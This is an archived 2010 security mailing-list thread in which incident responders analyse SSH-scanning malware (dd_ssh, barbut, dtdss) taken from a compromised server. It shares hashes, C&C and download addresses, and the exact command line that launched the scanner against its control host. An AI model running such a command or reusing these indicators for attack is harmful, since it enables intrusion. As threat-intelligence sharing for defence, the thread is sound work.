[nsp-sec] distributed ssh scanners again

Smith, Donald Donald.Smith at qwest.com
Wed Nov 3 13:31:11 EDT 2010 

dd_ssh appears to be based on this Libssh client side library based on this string found in it.

0.4.3 (c) 2003-2008 Aris Adamantiadis (aris at 0xbadc0de.be) Distributed under the
LGPL, please refer to COPYINGfile for information about your rights


barbut is a verions of Kaiten.

http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2006-021417-0144-99


(coffee != sleep) & (!coffee == sleep)
Donald.Smith at qwest.com gcia


> >> -----Original Message-----
> >> From: Torsten Voss [mailto:voss at dfn-cert.de]
> >> Sent: Wednesday, November 03, 2010 10:13 AM
> >> To: Smith, Donald
> >> Cc: 'nsp-security at puck.nether.net'
> >> Subject: Re: [nsp-sec] distributed ssh scanners again
> >>
> > I thought it too, but on the system was no phpmyadmin
> > installed. It is not
> > clear which vulnerbility was used.
> >
> > Shure, you can share the information with your customers.
> >
> > Cheers,
> > Torsten
> >
> > Am 03.11.2010 17:04, schrieb Smith, Donald:
> >>>> Torsten, is it ok to share the fact that this is probably
> > due to a vulnerable version of phpmyadmin internally and with
> > customers?
> >>>>
> >>>>
> >>>>
> >>>> (coffee != sleep) & (!coffee == sleep)
> >>>> Donald.Smith at qwest.com gcia
> >>>>
> >>>>> -----Original Message-----
> >>>>> From: nsp-security-bounces at puck.nether.net
> >>>>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> >>>>> Torsten Voss
> >>>>> Sent: Wednesday, November 03, 2010 9:44 AM
> >>>>> To: nsp-security at puck.nether.net
> >>>>> Subject: Re: [nsp-sec] distributed ssh scanners again
> >>>>>
> >>>>> ----------- nsp-security Confidential --------
> >>>>>
> >>>> Hi,
> >>>>
> >>>> we've recieved the malware from an compromised system:
> >>>>
> >>>> The malware was started similar then the last one in summer:
> >>>>
> >>>> PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
> >>>> 217.79.190.53 2 2>/dev/null >/dev/null
> >>>>
> >>>> 217.79.190.53 is probaly the C&C server for the distributed
> > ssh scans
> >>>>
> >>>> The initial malware was probably downloaded at
> >>>> http://195.69.220.2/a.txt
> >>>>
> >>>> Three files were found:
> >>>> 60ccf6902bcc37550954383be1461041  barbut
> >>>> 3f25289959d9fecc72cf24d2e300c97b  dd_ssh
> >>>> 30a1e1ae9d573b2daceb71f9ec8c0ce8  dtdss
> >>>>
> >>>> IP 195.69.220.2 is hardcoded in the dtdss file
> >>>> IP 217.79.181.30 is included in the barbut file
> >>>>
> >>>> If someone would like a copy, please send us an email.
> >>>>
> >>>> Kind regards,
> >>>>   Torsten, AS680
> >>>>
> >>>>
> >>>>>
> >>>>>
> > _______________________________________________
> > nsp-security mailing list
> > nsp-security at puck.nether.net
> > https://puck.nether.net/mailman/listinfo/nsp-security
> >>>>>
> > Please do not Forward, CC, or BCC this E-mail outside of the
> > nsp-security
> > community. Confidentiality is essential for effective
> > Internet security counter-measures.
> > _______________________________________________
> >>>>>
> >
> >>>> This communication is the property of Qwest and may contain
> > confidential or
> >>>> privileged information. Unauthorized use of this
> > communication is strictly
> >>>> prohibited and may be unlawful.  If you have received this
> > communication
> >>>> in error, please immediately notify the sender by reply
> > e-mail and destroy
> >>>> all copies of the communication and any attachments.
> >
> >
> >
> >>
>
> > This communication is the property of Qwest and may contain
> confidential or
> > privileged information. Unauthorized use of this
> communication is strictly
> > prohibited and may be unlawful.  If you have received this
> communication
> > in error, please immediately notify the sender by reply
> e-mail and destroy
> > all copies of the communication and any attachments.
>
>
>
> --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone
> +49 40 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone  +49
> 40 808077-590
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.:
> DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter
> Kossakowski
>
> Automatische Warnmeldungen
> https://www.cert.dfn.de/autowarn
>
>

This communication is the property of Qwest and may contain confidential or
privileged information. Unauthorized use of this communication is strictly
prohibited and may be unlawful.  If you have received this communication
in error, please immediately notify the sender by reply e-mail and destroy
all copies of the communication and any attachments.

More information about the nsp-security mailing list